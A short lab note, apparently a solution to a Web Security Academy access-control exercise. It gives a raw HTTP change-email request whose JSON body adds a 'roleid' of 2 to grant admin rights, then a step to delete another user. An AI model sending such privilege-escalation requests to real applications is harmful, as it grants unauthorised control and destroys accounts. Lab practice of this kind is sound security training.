Change roleid to admin roleid = 2

POST /my-account/change-email HTTP/2
Host: 0a0400eb04f9c07a82a365f4003b0092.web-security-academy.net
Cookie: session=sigkKHzcXziz5eBeG4QW1xCE40KuFhdK
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 41
Origin: https://0a0400eb04f9c07a82a365f4003b0092.web-security-academy.net
Referer: https://0a0400eb04f9c07a82a365f4003b0092.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"email":"dsds@gmail.com",
"roleid":2
}

then remove corlos 